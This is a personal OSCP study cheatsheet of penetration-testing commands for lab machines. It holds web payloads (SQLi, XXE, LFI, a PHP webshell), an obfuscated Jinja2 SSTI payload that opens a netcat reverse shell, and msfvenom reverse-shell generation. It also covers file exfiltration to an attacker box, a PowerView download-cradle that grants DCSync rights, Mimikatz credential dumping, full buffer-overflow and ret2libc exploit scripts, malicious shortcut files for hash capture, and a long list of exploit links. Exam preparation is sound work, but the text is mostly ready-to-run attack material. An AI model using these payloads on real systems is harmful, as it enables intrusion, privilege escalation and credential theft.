{%hackmd theme-dark %} # OSCP Cheatsheet: MOTHER OF ALL OMELETTES can't fret over every single egg For report template, refer to CPTC or the given ones CPTC: https://github.com/nationalcptc/report_examples Other given thing: https://github.com/whoisflynn/OSCP-Exam-Report-Template ## Foothold ### Web Always bruteforce directories in the background and manually search the websites as you brute. If it seems like a custom application or is empty, do a quick inspect elements check on the pages Check POST requests in Burp, pay attention to cookies and parameters - `ffuf -u <http/https> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host:FUZZ.domain" -fw <word count of false positives>` - https://null-byte.wonderhowto.com/how-to/fuzz-parameters-directories-more-with-ffuf-0330806/ - `gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://website:port -t threads -x .php,.txt,.etc` - Found a domain name? Vhosts. ` gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u worker.htb ` - `wpscan --url <url> --disable-tls-checks --api-token <token>` - Brute force with Hydra: `hydra boxIP -s PORTNUM http-post-form -l username -P /path/wordlist'/url/from/webroot:log=James&pwd=^PASS^&other_post_parameters:F=message when login fails'` - SQLi test: `'admin or 1=1;#` or just a `'` - Test IDOR if parameters or directory allow it (`?id=0 or /users/0`) type of thing ### LFI / RFI - Refer to another php page, page restricted to localhost, or your own hosted php (ivan). Brute force all php methods if necessary. - `?page=php://filter/convert.base64-encode/resource=../../../something.php` - `exec, passthru, system, shell_exec` - PHP file poisoning, try to include `/var/log/apache2/access.log`, `/var/log/auth.log`(for ssh, or the respective one for vsftpd) - `/var/log/nginx/error.log`, `/var/log/nginx/access.log` ### File upload - If file upload on aspx or asp, try those files or a .config (https://0xdf.gitlab.io/2018/10/27/htb-bounty.html#webconfig-rce) or a .master (butch.md) - Common php webshell: Ivan or `<?php system($_GET['cmd']);?>` - jpg magic bytes `echo -ne '\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0d\x49\x48\x44\x52' > shit.php.jpg` ### SQLI Payloads - First, confirm SQLi with `' or 1=1;--` (If that bypasses login or crashes something), or something like `1+1` which resolves to 2 - if reflected output, try union injection. - `'UNION SELECT 1,1,1;--` replaces all columns with 1's. May need to adjust the 1's accordingly. - After getting the needed columns, enumerate db. `' UNION SELECT 1, group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database();-- `. reading from information_schema needs 7 columns, but the reflected output may be within the first/second/etc. column so adjust accordingly - Other stuff: `group_concat(column_name) ... information_schema.columns where table_schema=database()` - `group concat(password) from mysql.user` ### Wordpress Stuff - `/wp-content/plugins/akismet/akismet.php`. If we're authenticated, try modifying this plugin with Ivan. Alternatively you can just modify an existing theme and go to the path of that page `/wp-content/themes/themename/404.php` ### API stuff honestly api's are tough as hell (cptc flashbacks) - Try to see what methods the endpoints accept - `curl -X OPTIONS http://bruh:5000` - Fuzz parameters being passed ### XXE - ``` <?xml version=”1.0″ ?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM “file:///etc/passwd” >]> <element>&xxe;</element> ``` ### SSTI Jinja2 - Test with `{{ 7*7}}`, see if it returns 49 (Jinja2) - ```! {% include request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10\x2e10\x2e16\x2e6 4444 >/tmp/f")|attr("read")() %} ``` - WAF avoiding payload that does a nc revshell. adjust accordingly ### Tomcat - Upload war then access at /shell.war - Reverse proxy path traversal: `http://10.10.11.138/bruh/..;/manager/html` ### Reverse Shell Payloads https://www.revshells.com - Encoded: `echo -e "<base64encoded revshell cmd" | base64 -d | bash` - Note the python ones, theyre ipeless and angle bracket-less (some rce service exploits might not work with `|`s and `> or <`) - Msfvenom - Linux: `msfvenom -p linux/x86_or_x64/shell_reverse_tcp LPORT=PORT LHOST=HOST -f .so/.elf -o shell.so/elf` - Windows x64: `msfvenom -p windows/x64/shell_reverse_tcp LPORT=PORT LHOST=HOST -f .exe/.dll -o shell.exe/.dll` - x86: `msfvenom -a x86 -p windows/shell_reverse_tcp LPORT=PORT LHOST=HOST -f .exe/.dll -o shell.exe/.dll` - Shellcode: `msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "\x00\xOtherBadStuff" -f c` - `msfvenom -p windows/exec CMD="blah" -f python -b "\bad"` ## Privilege Escalation - `strings`and `file` any funky data file - pspy monitor processes (especially helpful for sneaky cronjobs) ### Linux Enumeration https://gtfobins.github.io - SUIDS: `find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l --color {} \; 2> /dev/null ` - Find keywords in directories: `grep -Ri "text" /path/ 2>/dev/null` - Ports/Services: `netstat -tulpn` - If `SETENV` on sudo, `sudo LD_PRELOAD=/tmp/shell.so command` - `getcap -r / 2>/dev/null`, GTFObins if anything interesting - Run linpeas ### Linux Exfiltration - `cat file | nc kali port` - On Kali: `nc -nvlp port > file`. Vice versa for importing files to victim - `wget http://kali_ip:port/file` or `curl http://kali_ip:port/file > file` - On Kali: `python3 -m http.server`. Vice versa for importing files to victim - If you don't have nc or other ways to transfer stuff, python3 putserv ``` import argparse import http.server import os class HTTPRequestHandler(http.server.SimpleHTTPRequestHandler): def do_PUT(self): path = self.translate_path(self.path) if path.endswith('/'): self.send_response(405, "Method Not Allowed") self.wfile.write("PUT not allowed on a directory\n".encode()) return else: try: os.makedirs(os.path.dirname(path)) except FileExistsError: pass length = int(self.headers['Content-Length']) with open(path, 'wb') as f: f.write(self.rfile.read(length)) self.send_response(201, "Created") if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--bind', '-b', default='0.0.0.0', metavar='ADDRESS', help='Specify alternate bind address ' '[default: all interfaces]') parser.add_argument('port', action='store', default=8000, type=int, nargs='?', help='Specify alternate port [default: 8000]') args = parser.parse_args() http.server.test(HandlerClass=HTTPRequestHandler, port=args.port, bind=args.bind) ``` - Then `curl http://kali:port --upload-file file` (if windows has curl, this works too) ### Windows Enumeration - Run winPEAS - `systeminfo` and find relevant exploit to build number - `whoami /all` - seBackup & seRestore: https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/ - seRestore: https://github.com/xct/SeRestoreAbuse - seImpersonate (Server 2016 and before): JuicyPotato `Juicy.Potato.exe -l 4445 -p shell.exe -t * -c clsid`http://ohpe.it/juicy-potato/CLSID/ - Server 19+, RoguePotato: https://github.com/antonioCoco/RoguePotato - Server 2003: https://github.com/Re4son/Churrasco/blob/master/churrasco.exe - SeLoadDriver: `https://github.com/ma7amd/SeLoadDriverPrivilege` (Refer to a Fuse HTB writeup) - `.\EOPLOADDRIVER.EXE System\CurrentControlSet\MyService C:\Temp\Capcom.sys` ### Windows Exfiltration `C:\Windows\Temp` is a safe directory. Or try to make a `C:\temp` - `C:\System32\curl.exe http://kali_ip:port/file > file` - `certutil.exe -urlcache -f http://link file` - `copy \\kali_ip\share_name\file file` - to exfiltrate `copy file \\kali_ip\share_name\file` - on Kali, `smbserver.py share .` add the `-smb2support` if necessary - If that's being funky, try: `net use X: \\kali_ip\share`, then `copy file X:\file` ## Active Directory ### AD Enumeration https://wadcoms.github.io - Kerberoasting: `GetUserSPNs.py -request -dc-ip active.htb active.htb/SVC_TGS -outputfile hashes` - run `ntpdate` a few times it it doesn't work - on host, `Rubeus.exe kerberoast` - `enum4linux 10.10.10.10` , or the python alternative `https://github.com/cddmp/enum4linux-ng` - `kerbrute userenum -d htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.161` - ASREPRoasting `GetNPUsers.py htb.local/santi -usersfile userlist -dc-ip 10.10.10.161` - Valid Creds, `bloodhound-python -u 'svc-alfresco' -p 's3rvice' -ns 10.10.10.161 -d htb.local -c all`, or run SharpHound on host. ### Bloodhound Nodes or Groups - `exchange windows permissions` ==> Give DCSync rights to self (exit and re-enter winrm to refresh) - ``` IEX(New-Object Net.WebClient).downloadString('http://10.10.16.2:8000/PowerView.ps1') $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('htb.local\svc-alfresco', $SecPassword) Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=htb,DC=local' -Rights DCSync -PrincipalIdentity svc-alfresco -Verbose -Domain htb.local Add-DomainObjectAcl -TargetIdentity "Domain Admins" -Rights WriteMembers -PrincipalIdentity svc-alfresco ``` - DNSAdmins ==> control dns, dll hijack. - `dnscmd RESOLUTE.MEGABANK.LOCAL /config /serverlevelplugindll \\10.10.16.6\\share\bruh.dll && dnscmd RESOLUTE.MEGABANK.LOCAL /Restart` - Backup Operators ==> SeRestore and SeBackup ### AD Looting - Remote DC-Sync: `secretsdump.py -just-dc <user>:<password>@<ipaddress>` - `mimikatz.exe "sekurlsa::logonpasswords" "exit" > sek.txt` - `mimikatz.exe "lsadump::sam" "exit" > sam.txt` - If not system, may have to preface these with `"privilege::debug" and "token::elevate"` - If you get a Key Import error, try this older version - https://github.com/gentilkiwi/mimikatz/files/4167347/mimikatz_trunk.zip ## Down Bad - Custom wordlist: `cewl http://10.10.10.191/ -d 4 --with-numbers > cewlpasswords` (d specifies min length) - Scan UDP ports - script=vuln in ## Pivoting My preferred tools are SSH and Chisel (https://github.com/jpillora/chisel/releases/tag/v1.7.7) - ### Port to Port - Local Foward with SSH - `ssh -L localport:host:hostport user@bruh` - forwards traffic sent from your localport to theirs - Reverse Forward with SSH - `ssh -R localport:host:hostport user@bruh` - Forwards traffic sent from their hostport to your localport - Reverse Forward with Chisel - First set up chisel server `chisel server --port 8000`. You probably want to do this on a machine that can hit both you and the internal hosts - `chisel client serverIP:serverPort R:serverListenerPort:ipToFowardTo:portToForwardTo` - ### Socks/Dynamic Forwards Make sure you edit your proxychains configuration to use the correct port - SSH - `ssh -D 1080 user@bruh` - Chisel Make sure you already have your sever set up - `chisel client serverIP: R:1080:socks` ## Windows Remote BOF ### 1. Find the overflow We can use the following Python3 script to see if something is crashable ```! #!/usr/bin/python3 import socket, time, sys ip = "10.10.89.36" #CHANGE THIS port = 1337 #CHANGE THIS timeout = 5 prefix = "OVERFLOW4 " #If necessary string = prefix + "A" * 100 while True: try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(timeout) s.connect((ip, port)) s.recv(1024) print("Fuzzing with {} bytes".format(len(string) - len(prefix))) s.send(bytes(string, "latin-1")) s.recv(1024) except: print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) sys.exit(0) string += 100 * "A" time.sleep(1) ``` After this we generate a pattern and then modify our script to utilize it. ```! /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q [8 bit string] ``` Use this python3 script to overflow and find the EIP value to pass to the above command ```! #!/usr/bin/python3 import socket, time, sys ip = "10.10.229.28" port = 1337 timeout = 5 prefix = "OVERFLOW10 " #If necessary string = #that long stuff from above string = prefix + string with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(timeout) s.connect((ip, port)) s.recv(1024) s.send(bytes(string, "latin-1")) s.recv(1024) ``` ### 2. Find the bad characters ```! #!/bin/python3 for x in range(1, 256): print("\\x" + "{:02x}".format(x), end='') print() \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff ``` utilize the Python script below to test bad characters. Jump to the ebx to check. the order of stuff goes like 01 02 03 etc. If there is somthing funky like 01 02 03 A0, then 04 (\x04) is a bad character ```! #!/usr/bin/python2 import socket offset=1978 #CHANGE THIS overflow="A"*offset bad = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" prefix= "OVERFLOW1 " #CHANGE THIS payload = prefix + bad + overflow s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.10.89.36", 1337)) #CHANGE THIS s.send(payload) print(len(payload)) ``` ### 3. Find the JMP that lacks the bad characters ``!mona jmp -r esp -cpb "\x00\others"`` ### 4. Format the payload (check below). ``` #!/usr/bin/python2 import socket offset=340 #CHANGE THIS prefix=b"OVERFLOW 6" #if necessary overflow=prefix+b"A"*offset retn=b"\x03\x15\x10\x41" #JMP ESP padding = b"\x90"*20 #msfvenom -p windows/exec CMD="blah" -f python -b "\bad" #or #msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "\x00\xOtherBadStuff" -f py buf = b"" buf += #stuff here payload = overflow + retn + padding + buf + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.210.129", 7138)) s.send(payload) print(len(payload)) ``` ### Extra Notes and Things Avoid dll's with ASLR and SEH when looking for the JMP ESP Run !mona modules to view the potential dll's that have valid JMP ESPs will show us which dll's are safe, but they might not have JMP ESP ## Linux x32 Local BOF via ret2libc ### 1. Overflow the binary Hopefully you're using gdb-peda. Also, to ensure ASLR is disabled, on the machine with the binary, run ldd on it a few times to see if the memory addresses change. ``` gdb ./binary gdb-peda$ pattern create 200 AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA gdb-peda$ run [above] ``` ### 2. Find the offset and check the output After reading the output (assuming it crashed, there should be a lot and the EIP being overwritten with some arbitrary 4 letter string) `gdb-peda$ [4 letters from output]` ### 3. Find the offset and check the output make sure you run these commands on the victim machine, since memory addresses may differ between hosts and our machine ``` ldd binary | grep lib libc.so.6 => /lib32/libc.so.6 (0xf7dc0000) strings -a -t x /lib32/libc.so.6 | grep /bin/sh 18f924 /bin/sh readelf -s /lib32/libc.so.6 | grep system 1561: 00045120 55 FUNC WEAK DEFAULT 14 system@@GLIBC_2.0 readelf -s /lib32/libc.so.6 | grep exit 152: 00037ab0 33 FUNC GLOBAL DEFAULT 14 exit@@GLIBC_2.0 ``` Now we know where libc is. We also know the memory address offset between the methods in libc (the /bin/sh, system, and exit). Add these addresses to get the full address to reference in our payload. Example is below ``` Address we want = libc + the method address, then converted to little endian. You can use python to add these. SYSTEM ADDRESS: 0xf7dc0000 + 0x0018f924 = 0xf7f4f924 = \x24\xf9\xf4\xf7 EXIT ADDRESS: 0xf7dc0000 + 0x00045120 = 0xf7e05120 = \x20\x51\xe0\xf7 BINSH ADDRESS: 0xf7dc0000 + 0x00037ab0 = 0xf7df7ab0 = \xb0\x7a\xdf\xf7 ``` ### 4. Payload ``` ./overflow $(python2 -c 'print "\x90" * 112 + "\x24\xf9\xf4\xf7\x20\x51\xe0\xf7\xb0\x7a\xdf\xf7"') ``` Note the order is in a certain way due to the way code executes in the stack. Payload order is: overflow + system addr + return addr (probably exit) + arguments (/bin/sh). Also please use python2 for this. Some scripts below for automating this against ASLR or just to not type it all in ```! #!/usr/bin/python2 import os import struct libraryAddr = 0xb7e19000 binshAddr = 0x0015ba0b systemAddr = 0x0003ada0 exitAddr = 0x0002e9d0 binshAddr = struct.pack('<I', libraryAddr + binshAddr) systemAddr = struct.pack('<I', libraryAddr + systemAddr) exitAddr = struct.pack('<I', libraryAddr + exitAddr) buffer = 'A' * 52 buffer += systemAddr buffer += exitAddr buffer += binshAddr print(buffer) os.system('/home/ayush/.binary/rop' + " " + buffer) ``` And the ASLR one (hopefully it barely changes the address, else this takes years) ``` #!/usr/bin/python2 import subprocess import struct base = 0xb7622000 syst = 0x00040310 exit = 0x00033260 binsh = 0x00162bac syst_final = struct.pack("<I", base+syst) exit_final = struct.pack("<I", base+exit) binsh_final = struct.pack("<I", base+binsh) buf = "A" * 112 buf += syst_final buf +=exit_final buf += binsh_final i=0 while (i<50): print "Try: %s" %i print buf i += 1 ret = call(["/usr/local/bin/ovrflw", buf]) ``` # EXPLOIT LOG This is probably like 90% of the CVEs, Microsoft security stuff, ExploitDB, and Github stuff that I found from HTB, PG, etc. Its a lot ## General Web Services - Coldfusion Adobe Directory Traversal https://www.exploit-db.com/exploits/14641 - https://pentest.tonyng.net/attacking-adobe-coldfusion/ - Bludit CMS <= 3.9.2 https://github.com/hg8/CVE-2019-16113-PoC - Gym management System 1.0 RCE https://www.exploit-db.com/exploits/48506 - Tomcat: manager war upload `msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f war > shell.war`, then access from `/shell.war` - default creds `tomcat:tomcat or tomcat:s3cret`, something along the lines of that - PHP 8.1-dev: https://www.exploit-db.com/exploits/49933 - Voting System Using PHP CMS https://www.exploit-db.com/exploits/49846 - Open Net Admin 18.1.1 RCE https://github.com/amriunix/ona-rce/blob/master/ona-rce.py - Magento 1.9 SQLi https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py - Magento authenticated rce https://www.exploit-db.com/exploits/37811 - Nostromo 1.9.6 RCE https://www.exploit-db.com/exploits/47837 - SSL < 1.0.1: Heartbleed https://www.exploit-db.com/exploits/32745/ - WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion https://www.exploit-db.com/exploits/44544 - Cacti 1.2.12 SQLIi to RCE https://www.exploit-db.com/exploits/49810 - Apache ofbiz 17.12.01 RCE https://www.exploit-db.com/exploits/50178 - DrupalGeddon2 https://www.exploit-db.com/exploits/44449 - https://github.com/pimps/CVE-2018-7600 - DrupalGeddon1 https://www.exploit-db.com/exploits/41564 - Authenticated RCE PHPmyadmin 4.8 https://www.exploit-db.com/exploits/50457 - October CMS 1.0.412 upload bypass https://www.exploit-db.com/exploits/41936 - Cute News 1.2.12 rce https://www.exploit-db.com/exploits/48800 - Wordpress Plugin Gwolle Guestbook 1.5.3 RFI https://www.exploit-db.com/exploits/38861 - Wordpress duplicator 1.3.26 file read https://www.exploit-db.com/exploits/50420 ## Linux - Screen SUID allows you to reattach to it if it exists `screen -x root/root` - Screen 4.5.0 SUID https://www.exploit-db.com/exploits/41154 - Sudo 1.8.27 <=, with !ALL ==> `sudo -u#-1 command` - Authenticated to Splunk: https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2 - Unreal IRCd 3.2.8.1 https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor - Distcc-cve-2004-2687: https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855 - Samba 3.0.0 through 3.0.25rc3: CVE-2007-2447 ==> https://github.com/amriunix/CVE-2007-2447/blob/master/usermap_script.py - ircd 3.2.8.1 backdoor shell https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor - distcc < 3.1(3632) https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855 - Samba 3.0.20 through 3.0.25rc3 https://github.com/amriunix/CVE-2007-2447 - Redis unauthenticated ssh key overwrite https://github.com/iw00tr00t/Redis-Server-Exploit - Or rogue server for command exeuction https://github.com/n0b0dyCN/redis-rogue-server - pfsense <2.14 authenticated RCe https://www.exploit-db.com/exploits/43560 - Shellshock https://www.exploit-db.com/exploits/34900 (if you find a valid /cgi-bin/.sh or related script, insert here) - Apache2 James Server 2.3.2 RCE when login: https://www.exploit-db.com/exploits/35513 (default root:root) ## Windows - Eternal blue MS17-010: https://github.com/worawit/MS17-010 - Checker (modify creds if necessary) ==> send_and_execute - IIS 6: https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell <== not always work - `C:\Program Files (x86)\mremotemg` Stores password in `C:\Users\<user>\AppData\Roaming\mRemoteNG` - https://github.com/haseebT/mRemoteNG-Decrypt `python3 mremoteng_decrypt.py -s <pass>` - Look for a `Groups.xml` in SMB shares if possible, then `gpp-decrypt` - CloudMe 1.11.2 BOF https://www.exploit-db.com/exploits/48389 - Microsoft x86, (MS11-046) https://vk9-sec.com/microsoft-windows-x86-afd-sys-local-privilege-escalation-ms11-046-2011-1249/ - If smb shares are manually being checked, create a malicious .scf, .lnk, or .url - .lnk `LFP[sP[sP[s54\\\\\192.168.49.100\x\lnk_794.ico\\\\192.168.49.100\\x\\lnk_794.ico\\\\192.168.49.100\\x\\lnk_794.ico` - ``` .url [InternetShortcut] URL=http://192.168.49.100/x/url_18.html IconIndex=1 IconFile=\\192.168.49.100\x\url_83.ico ``` - ``` .scf [Shell] Command=2 IconFile=\\10.10.16.2\share\test.ico [Taskbar] Command=ToggleDesktop ``` - Then set up `responder` or `smbserver.py` - CVE-2021-34527, Print Nightmare https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527 - SMB MS08-067 https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py - https://www.exploit-db.com/exploits/7132 - Cloudme 1.11.2 BOF-RCE POC: https://www.exploit-db.com/exploits/48389 (may require port forwarding) - Rejetto file share service RCE https://www.exploit-db.com/exploits/39161 (require you to set up a python server serving netcat and listener) - Umbraco CMS Authenticated RCE https://www.exploit-db.com/exploits/46153 - NSCLIENT++ 0.5.2.35 LFI https://www.exploit-db.com/exploits/46802 - Achat 0.15 https://www.exploit-db.com/exploits/36025 - Azure AD Connect: https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Azure-ADConnect.ps1